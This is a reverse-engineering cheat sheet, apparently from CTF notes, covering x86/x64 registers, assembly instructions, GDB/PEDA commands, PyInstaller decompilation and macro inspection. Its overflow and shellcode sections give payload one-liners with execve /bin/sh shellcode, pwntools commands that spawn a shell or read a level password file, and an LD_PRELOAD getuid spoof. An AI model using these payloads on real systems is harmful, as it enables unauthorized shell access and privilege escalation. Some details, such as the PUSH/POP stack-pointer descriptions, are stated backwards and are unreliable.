ReverseEngineering

ASM

Variables

x64

x32

What is ?

RAX

EAX

Return Value

RCX

ECX

Counter (or Fourth Arg)

RDX

EDX

Third Arg

RSI

ESI

Second Arg

RDI

EDI

First Arg of Function

RSP

ESP

Stack Pointer

RIP

EIP

Next Instruction

R8-R11

r8d-r11d

Scratch register

R12-R15

r12d-r15d

Preserved register

Source

Operation

Explication

MOV size dest,src

dest ← src

LEA dest,[op]

dest ← addr op

PUSH op

Increase RSP & Store op

POP op

Load op & Discrease RSP

ADD op1,op2

op1 ← op1 + op2

SUB op1,op2

op1 ← op1 - op2

NEG reg

reg ← -reg

INC reg

reg ← reg + 1

DEC reg

reg ← reg - 1

AND op1,op2

op1 ← op1 & op2

OR op1,op2

op1 ← op1

XOR op1,op2

op1 ← op1 ^ op2

CMP op1,op2

op1 - op2

TEST op1,op2

op1 & op2

JMP op

Jump to op

Source - Page 21

Overflow

Basic

(python -c "import struct; print('A' * (100 - 0) + struct.pack('<I', 0xffffffff))")

Shellcode

(python -c "import struct; print('\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80' + 'A' * (100 - 21) + struct.pack('<I', 0xffffffff))")

Shellcode

Cat

python -c "import pwn; shell = pwn.asm(pwn.shellcraft.i386.linux.cat('/home/users/level05/.pass')); print(shell); print(len(shell))"

Exec sh 1

python -c "import pwn; shell = pwn.asm(pwn.shellcraft.i386.linux.sh()); print(shell); print(len(shell))"

Exec sh 2

\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80
21

GDB

Command

b *0x12345678      # Breakpoint
b strcpy           # Breakpoint
r                  # Run program
r < <(echo lol)    # Run with pipe
r arg1 arg2        # Run with arg
c                  # Continue
n                  # Next operation
set $eax=0x00      # Set variable
info register      # Show Register

Print

x/s "string"
x/d 53
x/x 0xff
help x

print $rax

Get env address

x/10s **(char***)&environ

Peda

Install

git clone https://github.com/longld/peda.git ~/.peda
echo "source ~/.peda/peda.py" >> ~/.gdbinit
echo "DONE! debug your program with gdb and enjoy"

Binary ninja

Scrap code from html

let result = '';
[...document.querySelectorAll('.LinearDisassemblyLine')].forEach(parent_elmt => {
  [...parent_elmt.children].forEach(children_elmt => {
    result += children_elmt.textContent
  });
  result +=  '\n'
});
console.log(result);

Lib Injection

Recreate getuid function

uid_t	getuid(void)
{
	return (4242);
}

compile

gcc -shared -fpic lib.c -o libnike.so -m32

run and inject

LD_PRELOAD=./libnike.so ./exec

Decompile Python Executable

Convert executable into .pyc

git clone https://github.com/extremecoders-re/pyinstxtractor
cd pyinstxtractor
python3 pyinstxtractor.py exec

Disassembly .pyc (compatible python 3.9.2)

git clone https://github.com/zrax/pycdc
cd pycdc
cmake
make
./pycdc file.pyc # Convert .pyc into .py
./pycdas file.pyc # Convert .pyc into byte-code disassembly

Macro Office PPTM

Install

sudo pip3 install oletools

Decompress PPTM

olevba  -c file.pptm

ViperMonkey

PreviousPython NextStego

Last updated 3 years ago

hashtagASM

hashtagVariables

hashtagOperation

hashtagOverflow

hashtagBasic

hashtagShellcode

hashtagShellcode

hashtagCat

hashtagExec sh 1

hashtagExec sh 2

hashtagGDB

hashtagCommand

hashtagPrint

hashtagGet env address

hashtagPeda

hashtagInstall

hashtagBinary ninja

hashtagScrap code from html

hashtagLib Injection

hashtagDecompile Python Executable

hashtagMacro Office PPTM

hashtagInstall

hashtagDecompress PPTM

ASM

Variables

Operation

Overflow

Basic

Shellcode

Shellcode

Cat

Exec sh 1

Exec sh 2

GDB

Command

Print

Get env address

Peda

Install

Binary ninja

Scrap code from html

Lib Injection

Decompile Python Executable

Macro Office PPTM

Install

Decompress PPTM